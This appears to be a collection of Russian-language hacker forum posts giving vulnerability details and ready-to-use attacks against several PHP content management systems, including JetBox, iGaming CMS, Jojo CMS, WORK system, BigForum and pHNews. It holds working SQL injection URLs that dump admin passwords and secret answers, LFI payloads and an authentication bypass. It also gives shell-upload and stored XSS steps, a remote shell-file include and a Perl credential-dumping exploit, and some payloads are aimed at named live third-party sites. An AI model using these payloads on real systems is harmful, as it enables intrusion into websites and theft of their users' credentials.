http://localhost/jetbox/?view=-1'+union+select+1,"http://www.site.com/shell.txt",3,4,5,6,7,8,9,10,11,12+--+ http://ghostwriterreviews.com/jetbox/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6,7,8,9,10,11,12+--+ ---------------------------- blogs.php PHP: ... if ($item<>'' && is_numeric($item)) { $sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id AND struct.id=".$item; } elseif($option=='last10'){ $sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC LIMIT 10"; } else{ $sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC"; } #echo $sqlselect1; $result1 = mysql_prefix_query ($sqlselect1) or die (mysql_error()); $blogscount= mysql_num_rows($result1); if ($blogscount>'0') { $view_tpl = new Template("./"); $view_tpl->set_file("block", "blogs_item_tpl.html"); $view_tpl->set_block("block", "blogs","blogsz"); $view_tpl->set_var(array("absolutepathfull"=>$absolutepathfull )); while ($resultarray = mysql_fetch_array($result1)){ $records[1][5]=$resultarray["b_id"]; ob_start(); loggedin_workflow(); $containera = ob_get_contents(); ob_end_clean(); ... if ($item<>'' && is_numeric($item)) { //$t->set_var("containera", "add comments", true); $sqlselect1 = "SELECT * FROM blog_comments WHERE blog_id=".$id." ORDER BY blog_comments.c_id ASC"; $result1 = mysql_prefix_query($sqlselect1) or die (mysql_error()); $blog_commentcount= mysql_num_rows($result1); if ($blog_commentcount>'0') { $view_tpl2 = new Template("./"); $view_tpl2->set_file("block", "blog_comment_item_tpl.html"); $view_tpl2->set_block("block", "blog_comment","blog_commentz"); ... SQL rg=on http://localhost/jetbox/index.php?view=blog&item=1&id=1+union+select+1,2,user_password,4,5,type,user_password+from+user+--+ http://localhost/jetbox/view/blog/item/1/id/1+union+select+1,2,user_password,4,5,type,user_password+from+user+--+ Работает, если в блоге есть хотя бы одна запись. Получаем логин и пароль (не хеш) от админки.
iGaming iGaming CMS Product : iGaming CMS version : 1.5 site : forums.igamingcms.com SQL injection mq=off games.php PHP: $sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` "; if (!empty($_REQUEST['title'])) { $sql .= "WHERE `title` LIKE '$_REQUEST[title]%' "; if (!empty($_REQUEST['section'])) { $sql .= " AND `section` = '$_REQUEST[section]' "; } $sql .= " AND `published` = '1' "; } else { if (!empty($_REQUEST['section'])) { $sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' "; } else { $sql .= "WHERE `published` = '1' "; ... if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC") Code: http://localhost/games.php?order=genre§ion=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort= index.php Code: http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+ previews.php PHP: $preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'"); Code: http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+ Admin Panel (SQL inj) (LFI) LFI : support.php PHP: require_once("../sources/docs/$_REQUEST[id].php"); Code: http://localhost/admin/support.php?id=../../file%00 SQL injection : screenshots.php mq=off PHP: if (isset($_REQUEST['s'])) { $latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC"); Code: http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+
Stash CMS 1.0.3 1) bypass (требования: mq=off) file: /admin/library/authenticate.php PHP: function login($username,$password,$remember,$location){ $database = new Db(); $results = $database->sqlQuery("SELECT user_key,user_firstname,user_lastname, user_admin FROM ".TBPREFIX."_user WHERE user_password = '$password' AND user_username = '$username'"); if($results){ foreach($results as $results){ $userkey = $results['user_key']; $firstname = $results['user_firstname']; $lastname = $results['user_lastname']; $admin = $results['user_admin']; } $name = $firstname." ".$lastname; $uniquekey = $name.$userkey; $uniquekey = md5($uniquekey); $_SESSION['username'] = $name; $_SESSION['userkey'] = $userkey; $_SESSION['uniquekey'] = $uniquekey; $_SESSION['admin'] = $admin; if ($remember == true){ setcookie("bsm", $userkey, time()+108000); /* expire in 30 days */ setcookie("msb", $uniquekey, time()+108000); /* expire in 30 days */ } header('location:'.$location); }else{ return false; } } result: login: ' or '1'='1 pass: asd ------------------- боян ------------------- 3) blind sql injection (требования: mq=off,желательно 5 ветка бд) file: resetpassword.php PHP: $username = $_POST['username']; $check = $database->sqlQuery("SELECT count(*) as cnt FROM ".TBPREFIX."_user WHERE user_username = '$username'",TRUE,FALSE); if($check['cnt'] == 0){ if ($username == '') { $msg = 'You must enter your Username'; }else { $msg = $username. " doesn't exist"; } result: Тыкаем в /admin/login.php Forgot your password, в поле username пишем : Code: '/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)/**/and/**/'1'='1 ......
Ресурс http://download.ru/products/tiger-cms редактирование раздела в админке файл edit.php PHP: ... check_var($_GET['id']); $id_site = $_GET['id']; $get_site = mysql_query("SELECT * FROM content WHERE razdel_id = '".$id_site."' LIMIT 1"); if(mysql_num_rows($get_site) == 0) { mysql_query("INSERT INTO content(razdel_id,text) VALUES('".$id_site."','Текст')"); } $get_site = mysql_query("SELECT * FROM content WHERE razdel_id = '".$id_site."' LIMIT 1"); list($id,$razdel_id_id,$text) = mysql_fetch_array($get_site); $get_razdel_name = mysql_query("SELECT name FROM razdeli WHERE id='".$id_site."' LIMIT 1"); list($razdel_name) = mysql_fetch_array($get_razdel_name);... функия ис /admin/functions.php : PHP: ... function check_var($var) { if(!isset($var)) { die ("<script language='Javascript'>function reload() {location = \"index.php\"}; setTimeout('reload()', 0);</script>"); } } ... 1) SQL inj: Вывод в редактор !!! 2) Путь если ошибки включены. Файл admin\modules\razdel\delete.php: PHP: ... check_var($_GET['id']); $id = $_GET['id']; mysql_query("DELETE FROM razdeli WHERE id = '".$id."' LIMIT 1"); mysql_query("DELETE FROM content WHERE razdel_id = '".$id."' LIMIT 1"); echo 'Раздел удален'; ... 1) SQL inj: Файл admin\modules\razdel\save_content.php: PHP: ... check_var($_GET['site_id']); check_var($_POST['text']); check_var($_POST['razdel_name']); mysql_query("UPDATE razdeli SET name = '".$_POST['razdel_name']."' WHERE id='".$_GET['site_id']."' LIMIT 1"); mysql_query("UPDATE content SET text = '".$_POST['text']."' WHERE razdel_id = '".$_GET['site_id']."' LIMIT 1"); echo 'Раздел обновлен';... 1) SQL inj: нужно еще устанавливать пост: $_POST['text'], $_POST['razdel_name'] если не будет -переадресация ... 2. $_POST['razdel_name']'[SQL] должны быть установлены: - $_POST['text'] - action: Code: admin/index.php?module=razdel&task=save_content&site_id=13 3. $_POST['text']'[SQL] должны быть установлены: - $_POST['razdel_name'] - action: Code: index.php?module=razdel&task=save_content&site_id=13 Файл admin\modules\news\edit.php : PHP: ... check_var($_GET['id']); $id = $_GET['id']; $get_news_e = mysql_query("SELECT id,title,text,alltext FROM news WHERE id='".$id."' LIMIT 1"); list($id_news_e,$title_e,$text_e,$alltext_e) = mysql_fetch_array($get_news_e); ... 1) пути; 2) http://localhost/triger/center3/admin/index.php?module=news&task=edit&id=6'[SQL]; пример: Файл admin\modules\news\create.php: PHP: ... check_var($_POST['title']); $title = $_POST['title']; check_len($title,200); clear_my_string($title); $date = date("Y-m-d"); mysql_query("INSERT INTO news(title,text,alltext,date) VALUES('".$title."','".$_POST['text']."','".$_POST['alltext']."','".$date."')"); ... 1) SQL inj $_POST['alltext']'[SQL] обязательны: - $_POST['text']' 2) SQL inj $_POST['text']'[SQL] обязательны: - $_POST['alltext']; Файл admin\modules\news\delete.php: PHP: ... check_var($_GET['id']); $id = $_GET['id']; mysql_query("DELETE FROM news WHERE id = '".$id."' LIMIT 1"); echo 'Новость удалена'; ... 1) http://site/admin/index.php?module=news&task=delete&id=6'[SQL] Файл \admin\modules\news\save_news.php: PHP: ... check_var($_GET['id']); check_var($_POST['title']); check_var($_POST['text']); check_var($_POST['alltext']); $id = $_GET['id']; $title = $_POST['title']; $text = $_POST['text']; $all_text = $_POST['alltext']; $date = date("Y-m-d"); mysql_query("UPDATE news SET title = '".$title."',text = '".$text."',alltext = '".$all_text."',date='".$date."' WHERE id='".$id."' LIMIT 1"); echo 'Новость обновлена'; ... 1) SQL injection не привожу, аналогично, за пост не забываем ... Файл \admin\modules\tags\save.php : 1) SQL inj update... Условия: 1) mg=off; 2) админка;
Jojo CMS 1.0 Release Candidate 2 Официальный сайт: http://www.jojocms.org/ Последняя версия: Jojo CMS 1.0 Release Candidate 2(релиз 28 сентября 2009) 1)SQL-Injection Требования: отсутствуют. Путь до уязвимого скрипта: ../gelato/index.php Эксплуатация(по умолчанию админские данные лежат в таблице "gel_users"): Code: http://127.0.0.1/gelato/gelato/index.php?post=100500+union+select+1,concat%28user%28%29,0x3a,version%28%29,0x3a,database%28%29%29,3,4,5,6,7+--+ Реальный сайт: Code: http://jazzfaggot.ru/index.php?post=100500+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7+--+ Причина возникновения уязвимости: ошибка в логике проверки получаемых данных. PHP: if (isset($_GET["post"])) { $id_post = $_GET["post"]; if (!is_numeric($id_post) && $id_post < 1 ){ //достаточно выполнить только одно условие, для того чтобы пройти проверку на корректность header("Location: index.php"); } } else { if (isset($param_url[1]) && $param_url[1]=="post") { $id_post = (isset($param_url[2])) ? ((is_numeric($param_url[2])) ? $param_url[2] : NULL) : NULL; } else { $id_post = NULL; } } 2) SQL-Injection(админка) Требования: доступ к администраторской панели Путь до уязвимого скрипта: ../gelato/gelato/admin/user.php Эксплуатация: Code: http://127.0.0.1/gelato/gelato/admin/user.php?edit=2+union+select+1,2,3,4,5,6,7 Причина возникновения уязвимости: полное отсутствие фильтрации. 3)Path dislocure: Требования: вывод ошибок. Путь до уязвимого скрипта: ../gelato/index.php Эксплуатация: Code: [I]http://127.0.0.1/gelato/gelato/index.php?post[]=100500[/I] Реальный сайт: Code: http://madsc.iz.rs/index.php?post[]=8[/INDENT][/I] 4)Заливка шелла Требования: доступ в админку. Путь до уязвимого скрипта: ../gelato/admin/index.php Код уязвимого скрипта: PHP: if ($_POST["type"]=="2") { //слово "photo" переводится в числовой аналог скриптом, проинклюженным до этого if (isset($_POST["url"]) && $_POST["url"]!="") { $photoName = getFileName($_POST["url"]); //проверки на расширение нет-с if (!$tumble->savePhoto($_POST["url"])) { header("Location: ".$conf->urlGelato."/admin/index.php?photo=false"); die(); } $_POST["url"] = "../uploads/".sanitizeName($photoName); }[/I] [B] Эксплуатация: http://127.0.0.1/gelato/gelato/admin/index.php?new=photo В качестве фотографии выбираете ваш шелл, любое расширение, создаёте пост. Шелл будет загружен в папку uploads. Для того чтобы не спалить шелл на главной странице удалите ваш пост, шелл при этом удалён не будет. Также уязвим модуль загрузки фотографии\музыки\видео\итд. Причина возникновения уязвимости: отсутствие проверки на расширение. 5)Активная XSS Требования: включена возможность комментирования. Путь до уязвимого скрипта: ../gelato/index.php Уязвимое поле: <textarea name="content" id="content" cols="100" rows="10" tabindex="4"></textarea> Эксплуатация: занесите в уязвимое поле ваш java-script, предварительно закрыв тэг(">) Сайт с алертом: http://madsc.iz.rs/index.php/post/37.
WORK system CMS e-commerce http://sourceforge.net/projects/worksystem/ module/catalogue/view_catalogue.php PHP: $select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : ""; ... #read data of product supplier : addresses $error_select = ""; $total_select = 0; $query_selecta = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,b.POSTCODE as POSTCODEA,b.ADDRESS as ADDRESSA,b.TOWN as TOWNA,b.COUNTRY as COUNTRYA,b.USERNAME as USERNAMEA,b.EMAIL as EMAILA,b.PHONE as PHONEA,b.WEB_SITE as WEBSITEA FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."USER b where ID_CATALOGUE=".$select_catalogue." and a.CREATOR=b.USERID "; ... $query_select = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,c.POSTCODE,c.ADDRESS,c.TOWN,c.COUNTRY,c.EMAIL,c.COMPANY_NAME,c.PHONE FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."SHOPPING_DELIVERY c where ID_CATALOGUE=".$select_catalogue." and c.USERID=a.CREATOR"; ... $query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME, UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS, PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY, COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue"; SQL http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+union+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa# SQL http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++union+select+1,2,3,4,5,6,user(),8,9+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa# SQL http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++union+select+1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa# ----------------------- module/booking/view_room.php PHP: $select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : ""; ... $query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,RESUME, UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS, PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY, COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue"; SQL http://localhost/worksystem_4_0_39/module/booking/view_room.php?amp;work_url=0168e286bf&select_catalogue=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version()+limit+1,1 ----------------------- module\forum\detailforum.php PHP: include($g_include_forum."include_display_detailforum.php"); include_config.php PHP: global_register('GET','POST'); function global_register() { $num_args = func_num_args(); if ($num_args > 0) { for ($i = 0; $i < $num_args; $i++) { $method = strtoupper(func_get_arg($i)); if (($method != 'SESSION') && ($method != 'GET') && ($method != 'POST') && ($method != 'SERVER') && ($method != 'COOKIE') && ($method != 'ENV')) { die("The \"$method\" is invalid argument, The argument of global_register must be the following: GET, POST, SESSION, SERVER, COOKIE, or ENV"); } $varname = "_{$method}"; global ${$varname}; foreach (${$varname} as $key => $val) { global ${$key}; ${$key} = $val; } } }else{ die('You must specify at least one argument'); } } module\forum\include\include_display_detailforum.php PHP: $query_select = "SELECT ID,ID_INIT,TITLE,STATE,DESCRIPTION,CREATOR,UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION,LINK FROM ".$g_db_prefix."FORUM_INIT where ID=$select_forum and STATE=$state_display $profile_forum order by ORDER_DISPLAY asc, DATE_CREATION asc"; SQL http://localhost/worksystem_4_0_39/module/forum/detailforum.php?select_forum=3+union+select+1,2,user(),4,version(),6,7,8+--+&work_url=2fa5af6c22# ------------------------ module\news\view_news.php PHP: $select_news = ( isset($_REQUEST['select_news']) and intval($_REQUEST['select_news']) >= 1 ) ? $_REQUEST['select_news'] : ""; ... $query_select = "SELECT a.ID,a.TITLE,a.STATE,a.LINK,a.DESCRIPTION,b.CREATOR,a.FILE_NAME, UNIX_TIMESTAMP(a.DATE_CREATION) as DATE_CREATION,a.WHERE_IMAGE,a.SIZE_IMAGE,a.HITS,a.WRAPPER FROM ".$g_db_prefix."NEWS a, ".$g_db_prefix."NEWS_SUPPLIER b where ID=$select_news and a.ID=b.NEWS_ID "; SQL http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,user(),3,database(),version(),6,7,8,9,10,11,12+--+ ------------------------------ Заходим админом Кроме стандартного захода login : password, предусмотрен login : Secret answer, причем Secret answer хранится в таблице user открытым текстом. Узнаем префикс таблиц в базе. http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,TABLE_NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+information_schema.tables+--+ http://www.artpeinture.fr/work/module/news/view_news.php?select_news=12+union+select+1,TABLE_NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+information_schema.tables+--+&work_url=8cd560377a Читаем username и Secret answer http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,name,3,ANSWER,5,6,7,8,9,10,11,12+from+work_user+--+ Запасной вход http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=admin&work_url=8cd560377a или http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=blabla'+or+GROUP_ID=7+--+&work_url=8cd560377a вводим секретный ответ и мы админы.
BigForum Version: 4.5 http://sourceforge.net/projects/npage-bigforum/ SQL Injection: (Need mq = off) Будет редирект на значение 3 поля. В Author / Erstellen Залитие шелла: Выбираем как аватару шелл, и заливаем, /images/avatar/ . BigForum 4.5 SQL INJ EXPLOIT. PHP: #!/usr/bin/perl use LWP::Simple; print "\n"; print "##############################################################\n"; print "# BigForum Version: 4.5 SQL INJECTION #\n"; print "# Author: Ctacok (Russian) #\n"; print "# Blog : www.Ctacok.ru #\n"; print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n"; print "# Require : Magic_quotes = Off #\n"; print "##############################################################\n"; if (@ARGV < 2) { print "\n Usage: exploit.pl [host] [path] "; print "\n EX : exploit.pl www.localhost.com /path/ \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users"; $doc = get($host.$path."profil.php?id=".$vuln."+--+"); if ($doc =~ /:::(.+):(.+):(.+):::/){ print "\n[+] Admin id: : $1"; print "\n[+] Admin username: $2"; print "\n[+] Admin password: $3"; } Dork:
pHNews product : pHNews-alpha1-normal SQL injection modules/comments.php - code PHP: if ($ii >= $messagespp) { // Find out how many pages $pages = $ii / $messagespp; $pages = ceil($pages); $pages++; $page++; $pagesm = $pages - 1; $comm_output .= pages($pagesm,"?mod=comments&id=".$_GET['id']."&page="); } unset($tmp_ended); $sql = "SELECT lastread FROM Users WHERE UName = '$user_uname'"; $result = mysql_query($sql) or die('Query failed: ' . mysql_error()); $row = mysql_fetch_array($result, MYSQL_ASSOC); $exploaded = $pHNews->explodeAssoc("&", $row['lastread']); $exploaded[$_GET['id']] = time(); $sql = "UPDATE Users SET lastread='".$pHNews->implodeAssoc("&", $exploaded)."' WHERE UName = '$user_uname';"; mysql_query($sql); $mod_output .= mysql_error(); result mq=off SQL Injection Code: http://localhost/upload/indexfix.php?mod=comments&id=1'+and+0+union+all+select+1,version(),3,4,5,6,7,8--+ Blind SQL Injection Code: http://localhost/upload/indexfix.php?mod=comments&user_uname=[blind sql] modules/view_profile.php PHP: //$sql = "SELECT * FROM `Users` WHERE `UName`='{$_GET['user']}'"; //$result = mysql_query($sql) or die('Query failed: ' . mysql_error()); //$row = mysql_fetch_array($result); $row = $pHNews->get_user_info("", $_GET['user']); result : Code: http://localhost/upload/indexfix.php?mod=view_profile&user='+and+0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+ Local File Inclusion module/comments.php - code PHP: include "./$templates_dir/$template/comments.php"; mq=off result : Code: http://localhost/upload/modules/comments.php?templates_dir=../../upload/[file]%00 Code: http://localhost/upload/modules/comments.php?template=../../upload/[file]%00 (с) milw0rm SQL injection + Local File Inclusion mq=off rg=on Code: http://localhost/upload/indexfix.php?mod=view_profile'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=login'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=usercp'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=admin'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=register'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=news'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=about'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=terms'+and+0+union+all+select+[LFI],2--+
